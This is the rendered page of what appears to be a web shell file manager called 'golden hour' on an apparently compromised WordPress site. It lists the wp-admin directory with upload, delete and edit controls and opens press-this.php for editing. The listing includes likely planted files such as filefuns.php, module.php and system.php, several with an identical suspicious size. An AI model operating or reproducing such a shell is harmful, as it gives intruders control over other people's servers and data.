golden hour
/home/godaofbq/autismdefeated.com/wp-admin
⬆️ Go Up
Upload
File/Folder
Size
Actions
.htaccess
2 KB
Del
OK
admin-header.php
9.07 KB
Del
OK
admin.php
12.63 KB
Del
OK
api.php
6.83 KB
Del
OK
authorize-application.php
10.09 KB
Del
OK
credits.php
4.42 KB
Del
OK
css
-
Del
OK
customize.php
11.21 KB
Del
OK
db-status.php
6.83 KB
Del
OK
edit-form-advanced.php
28.79 KB
Del
OK
edit-tag-form.php
10.42 KB
Del
OK
edit.php
19.48 KB
Del
OK
error_log
3.26 KB
Del
OK
export.php
11 KB
Del
OK
filefuns.php
5.92 KB
Del
OK
font-library.php
1.01 KB
Del
OK
images
-
Del
OK
includes
-
Del
OK
index.php
7.68 KB
Del
OK
install-helper.php
6.8 KB
Del
OK
js
-
Del
OK
link-add.php
934 B
Del
OK
link-manager.php
4.26 KB
Del
OK
link-parse-opml.php
2.63 KB
Del
OK
load-scripts.php
2.02 KB
Del
OK
maint
-
Del
OK
media-new.php
3.17 KB
Del
OK
media-upload.php
3.58 KB
Del
OK
media.php
819 B
Del
OK
moderation.php
307 B
Del
OK
module.php
6.83 KB
Del
OK
ms-options.php
229 B
Del
OK
ms-upgrade-network.php
219 B
Del
OK
ms-users.php
215 B
Del
OK
nav-menus.php
49.07 KB
Del
OK
network
-
Del
OK
network.php
5.39 KB
Del
OK
options-general.php
22.32 KB
Del
OK
options-media.php
6.38 KB
Del
OK
options-permalink.php
21.89 KB
Del
OK
options-privacy.php
9.92 KB
Del
OK
options-reading.php
9.97 KB
Del
OK
options-writing.php
9.1 KB
Del
OK
options.php
13.93 KB
Del
OK
plugin-install.php
6.96 KB
Del
OK
post-new.php
2.7 KB
Del
OK
press-this.php
2.41 KB
Del
OK
privacy.php
2.83 KB
Del
OK
profile.php
283 B
Del
OK
revision.php
5.7 KB
Del
OK
setup-config.php
17.52 KB
Del
OK
site-editor.php
12.07 KB
Del
OK
site-health-info.php
4.05 KB
Del
OK
site-health.php
10.18 KB
Del
OK
system.php
6.83 KB
Del
OK
term.php
2.2 KB
Del
OK
theme-install.php
23.65 KB
Del
OK
update-core.php
45.12 KB
Del
OK
update.php
12.76 KB
Del
OK
upgrade-functions.php
341 B
Del
OK
user
-
Del
OK
user-edit.php
40.35 KB
Del
OK
user-new.php
24.06 KB
Del
OK
users.php
23.44 KB
Del
OK
widgets-form-blocks.php
5.12 KB
Del
OK
wp-blog-header.php
2.74 KB
Del
OK
wp-cron.php
2.74 KB
Del
OK
wp-load.php
6.83 KB
Del
OK
wp-signup.php
6.83 KB
Del
OK
Edit: press-this.php
<?php /** * Press This Display and Handler. * * @package WordPress * @subpackage Press_This */ define( 'IFRAME_REQUEST', true ); /** WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; function wp_load_press_this() { $plugin_slug = 'press-this'; $plugin_file = 'press-this/press-this-plugin.php'; if ( ! current_user_can( 'edit_posts' ) || ! current_user_can( get_post_type_object( 'post' )->cap->create_posts ) ) { wp_die( __( 'Sorry, you are not allowed to create posts as this user.' ), __( 'You need a higher level of permission.' ), 403 ); } elseif ( is_plugin_active( $plugin_file ) ) { include WP_PLUGIN_DIR . '/press-this/class-wp-press-this-plugin.php'; // @phpstan-ignore include.fileNotFound $wp_press_this = new WP_Press_This_Plugin(); // @phpstan-ignore class.notFound $wp_press_this->html(); } elseif ( current_user_can( 'activate_plugins' ) ) { if ( file_exists( WP_PLUGIN_DIR . '/' . $plugin_file ) ) { $url = wp_nonce_url( add_query_arg( array( 'action' => 'activate', 'plugin' => $plugin_file, 'from' => 'press-this', ), admin_url( 'plugins.php' ) ), 'activate-plugin_' . $plugin_file ); $action = sprintf( '<a href="%1$s" aria-label="%2$s">%2$s</a>', esc_url( $url ), __( 'Activate Press This' ) ); } else { if ( is_main_site() ) { $url = wp_nonce_url( add_query_arg( array( 'action' => 'install-plugin', 'plugin' => $plugin_slug, 'from' => 'press-this', ), self_admin_url( 'update.php' ) ), 'install-plugin_' . $plugin_slug ); $action = sprintf( '<a href="%1$s" class="install-now" data-slug="%2$s" data-name="%2$s" aria-label="%3$s">%3$s</a>', esc_url( $url ), esc_attr( $plugin_slug ), _x( 'Install Now', 'plugin' ) ); } else { $action = sprintf( /* translators: %s: URL to Press This bookmarklet on the main site. */ __( 'Press This is not installed. Please install Press This from <a href="%s">the main site</a>.' ), get_admin_url( get_current_network_id(), 'press-this.php' ) ); } } wp_die( __( 'The Press This plugin is required.' ) . '<br />' . $action, __( 'Installation Required' ), 200 ); } else { wp_die( __( 'Press This is not available. Please contact your site administrator.' ), __( 'Installation Required' ), 200 ); } } wp_load_press_this();
Save